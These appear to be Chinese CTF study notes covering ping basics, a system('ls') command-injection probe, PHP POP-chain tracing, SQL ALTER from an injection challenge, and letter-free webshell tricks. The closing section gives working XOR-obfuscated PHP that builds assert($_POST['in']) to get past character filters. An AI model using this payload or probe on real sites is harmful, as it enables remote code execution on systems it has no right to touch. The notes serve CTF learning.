Ting

判断

尝试{system(’ls’)}，看报错内容，一般会有提示

参考文章： 常用网络命令：ping命令的使用 CTF——ping相关

基本理论

1. Ping主要作用 （1）通常用来检测网络的连通情况和测试网络速度； （2）根据域名得到相应主机的IP地址； （3）根据ping返回的TTL值来判断对方所使用的操作系统及数据包经过路由器数量； （4）进行网络扫描和攻击。
2. 用法 对于网络管理员和普通用户来说，我们通常用它来测试网络的连通情况，如果无法正常上网，ping命令是检测网络故障的基本工具。 ping命令的最简单用法是在命令提示符下输入：ping 对方IP地址，这样就可以测试本机和对方主机之间的网络连通情况了
3. 常见词汇 bytes值：表示通信过程中发送的数据包大小，单位是字节。 time值：表示响应时间，这个时间越小，说明你与对方通信的速度越快，延时越短。 TTL值：Time To Live,表示数据包再经过多少个路由器如果还不能到达就将被丢弃，这里可以通过Ping返回的TTL值大小，粗略地判断目标系统类型是Windows系列还是UNIX/Linux系列。 默认情况下， Linux系统的TTL最大值为64或255， WindowsNT/2000/XP系统的TTL最大值为128， UNIX主机的TTL最大值为255。

Ping的用法

关键步骤：理清pop链&&做标记

第一步： 找eval、flag这些危险函数和关键字样（一般这就是链尾）==>看用到的参数 第二步： 找该参数所在位置，标注该参数，例如// 1[序号] shell[上一步找到参数的类] 第三步： 看目前所标记的这个参数所在函数的功能，通过了解功能找到能够触发这个函数的第二个参数。 …… 以此类推，当找到链头【即：含有或者是能够结束整个序列化的过程的类】

参考文章： BUUCTF[强网杯 2019]随便注 的三种解法 参考题目： [强网杯 2019]随便注

alter

1. 作用：修改已知表的列。 （ 添加：add | 修改：alter，change | 撤销：drop ）
2. 用法

（1）添加一个列

参考题目：[SWPUCTF 2021 新生赛]hardrce

参考文章： 一些不包含数字和字母的webshell 无字母数字webshell之提高篇

绕过思路

法一 利用异或绕过

1
2
3
4

('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`')  //'assert'
'_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']')  //'_POST'

('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`')($'_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']')['in'])   //'assert($_POST['in'])'

通过本方法可以绕过对于字母的限制